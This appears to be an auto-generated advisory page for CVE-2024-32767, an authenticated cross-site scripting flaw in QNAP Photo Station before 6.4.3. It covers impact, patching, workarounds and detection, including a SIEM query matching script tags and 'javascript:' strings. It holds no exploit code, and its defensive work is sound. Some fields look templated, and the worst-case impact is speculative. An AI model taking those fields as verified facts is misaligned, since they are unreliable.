CVE-2024-32767 – This cross-site scripting (XSS) vulnerability i... (How to Fix)

Q: What is the severity of CVE-2024-32767?

CVE-2024-32767 has a CVSS score of 6.3 (MEDIUM). This cross-site scripting (XSS) vulnerability in QNAP Photo Station allows authenticated remote attackers to inject malicious scripts into web pages. When exploited, it could enable session hijacking, credential theft, or malware delivery to users viewing the compromised pages. Organizations running vulnerable versions of Photo Station are affected.

📋 TL;DR

This cross-site scripting (XSS) vulnerability in QNAP Photo Station allows authenticated remote attackers to inject malicious scripts into web pages. When exploited, it could enable session hijacking, credential theft, or malware delivery to users viewing the compromised pages. Organizations running vulnerable versions of Photo Station are affected.

💻 Affected Systems

Products:

QNAP Photo Station

Versions: Versions prior to 6.4.3

Operating Systems: QTS (QNAP Turbo NAS operating system)

Default Config Vulnerable: ⚠️ Yes

Notes: Requires attacker to have user-level access to Photo Station application

📦 What is this software?

Photo Station by Qnap

View all CVEs affecting Photo Station →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal administrator credentials, take full control of the Photo Station application, pivot to other systems, or deploy ransomware across the network.

🟠

Likely Case

Attackers with user-level access could steal session cookies, perform actions as authenticated users, or redirect users to malicious sites.

🟢

If Mitigated

With proper network segmentation and web application firewalls, impact would be limited to the Photo Station application itself.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires authenticated access but uses common XSS techniques

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Photo Station 6.4.3 (2024/07/12) and later

Vendor Advisory: https://www.qnap.com/en/security-advisory/qsa-24-39

Restart Required: Yes

Instructions:

1. Log into QNAP App Center 2. Check for Photo Station updates 3. Install version 6.4.3 or later 4. Restart Photo Station service

🔧 Temporary Workarounds

Disable Photo Station

all

Temporarily disable Photo Station service if patching is not immediately possible

From QTS Control Panel: App Center → Photo Station → Disable

Network Isolation

all

Restrict access to Photo Station to trusted internal networks only

Configure firewall rules to block external access to Photo Station ports

🧯 If You Can't Patch

Implement strict input validation and output encoding at the web application firewall level
Enable Content Security Policy (CSP) headers to restrict script execution

🔍 How to Verify

Check if Vulnerable:

Check Photo Station version in QNAP App Center or via SSH: cat /etc/config/uLinux.conf | grep photo_station_version

Check Version:

cat /etc/config/uLinux.conf | grep photo_station_version

Verify Fix Applied:

Confirm version is 6.4.3 or higher in App Center or via version check command

📡 Detection & Monitoring

Log Indicators:

Unusual POST requests to Photo Station endpoints
Suspicious script tags in URL parameters or form submissions

Network Indicators:

Multiple failed authentication attempts followed by successful login and script-like payloads

SIEM Query:

source="qnap_logs" AND (app="photo_station" AND (url="*<script*" OR param="*javascript:*"))

📊 Metadata

CVE ID: CVE-2024-32767

CVSS v3 Score: 6.3 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N

CWE: CWE-79

Published: November 22, 2024

Last Updated: September 20, 2025

🔗 References

https://www.qnap.com/en/security-advisory/qsa-24-39 Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-32767, you might also want to check these: